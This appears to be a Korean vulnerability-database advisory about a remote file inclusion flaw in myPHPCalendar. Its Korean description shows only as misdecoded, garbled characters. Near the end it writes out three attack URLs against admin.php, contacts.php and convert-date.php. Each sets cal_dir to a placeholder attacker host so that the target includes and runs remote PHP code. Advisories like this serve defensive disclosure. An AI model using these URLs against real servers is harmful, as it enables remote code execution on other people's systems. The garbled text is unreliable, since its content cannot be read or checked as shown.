Ãë¾àÁ¡ID |
21266 |
À§Çèµµ |
40 |
Æ÷Æ® |
80, ... |
ÇÁ·ÎÅäÄÝ |
TCP |
ºÐ·ù |
CGI |
»ó¼¼¼³¸í |
ÇØ´ç myPHPCalendar´Â ´Ù¼öÀÇ ½ºÅ©¸³Æ® °áÇÔÀ¸·Î ÀÎÇÑ ÆÄÀÏ »ðÀÔ Ãë¾àÁ¡À» °¡Áö°í ÀÖ´Ù. myPHPCalendar´Â PHP4·Î ÀÛ¼ºµÈ ¹«·á·Î »ç¿ë °¡´ÉÇÑ ´Þ·Â ÇÁ·Î±×·¥À¸·Î½á, MySQL µ¥ÀÌÅͺ£À̽º¸¦ »ç¿ëÇϰí MS Windows, Linux, Unix °è¿ÀÇ ¿î¿µÃ¼Á¦ »ó¿¡¼ µ¿ÀÛÇÑ´Ù. ÀÌ myPHPCalendarÀÇ ¹öÀü 10192000 Build 1 Beta ´Â admin.php, contacts.php, convert-date.php¿Í °°Àº ´Ù¼öÀÇ ½ºÅ©¸³Æ® °áÇÔÀ¸·Î ÀÎÇÏ¿© ¾ÇÀÇÀûÀÎ ¼¹ö »ó¿¡¼ Á¦°øµÇ´Â PHP ÆÄÀϵéÀÌ ´ë»ó È£½ºÆ®¿¡ Æ÷ÇÔ(include)µÉ ¼ö ÀÖ´Â °áÇÔÀÌ Á¸ÀçÇÑ´Ù. °ø°ÝÀÚ´Â ¾ÇÀÇÀûÀÎ ¼¹ö »ó¿¡ ¾ÇÀÇÀûÀÎ PHP ÆÄÀϵéÀ» ¼³Ä¡ÇÏ¿© Ãë¾àÇÑ ½Ã½ºÅÛ¿¡ ÀÓÀÇÀÇ Äڵ带 ½ÇÇà½ÃŰ´Â µ¥ ±× ÆÄÀϵéÀ» »ç¿ëÇÒ ¼ö ÀÖ´Ù. ¿ø°ÝÁöÀÇ °ø°ÝÀÚ´Â Àμö·Î½á ¿ø°ÝÁöÀÇ ½Ã½ºÅÛ»ó¿¡ ÀÖ´Â ¾ÇÀÇÀûÀÎ PHP ÆÄÀÏÀ» ¸í±âÇÑ Àß Á¶ÀÛµÈ URL ¿äûÀ» 'admin.php' ȤÀº 'contacts.php' ½ºÅ©¸³Æ®·Î º¸³½´Ù. ÀÌ´Â ÀÌ ¹®Á¦¿¡ ¿µÇâÀ» ¹Þ´Â ½Ã½ºÅÛ»ó¿¡ ÀÓÀÇÀÇ Äڵ带 ½ÇÇà½Ãų ¼ö ÀÖ°Ô ÇØ ÁØ´Ù.
http://[target]/admin.php?cal_dir=http://[attacker]/ http://[target]/contacts.php?cal_dir=http://[attacker]/ http://[target]/convert-date.php?cal_dir=http://[attacker]/
* Âü°í »çÀÌÆ® : http://archives.neohapsis.com/archives/vulnwatch/2003-q4/0011.html
* ¿µÇâÀ» ¹Þ´Â Ç÷§Æû: MyPHPCalendar 10192000 Build1 Beta Linux Any version Unix Any version Windows Any version |
ÇØ°áÃ¥ |
2014³â 6¿ù ÇöÀç ÀÌ Ãë¾àÁ¡¿¡ ´ëÇÑ ÀûÀýÇÑ ÇØ°áÃ¥Àº Á¦½ÃµÇ¾î ÀÖÁö ¾Ê´Ù. |
°ü·Ã URL |
(CVE) |
°ü·Ã URL |
(SecurityFocus) |
°ü·Ã URL |
13409 (ISS) |
|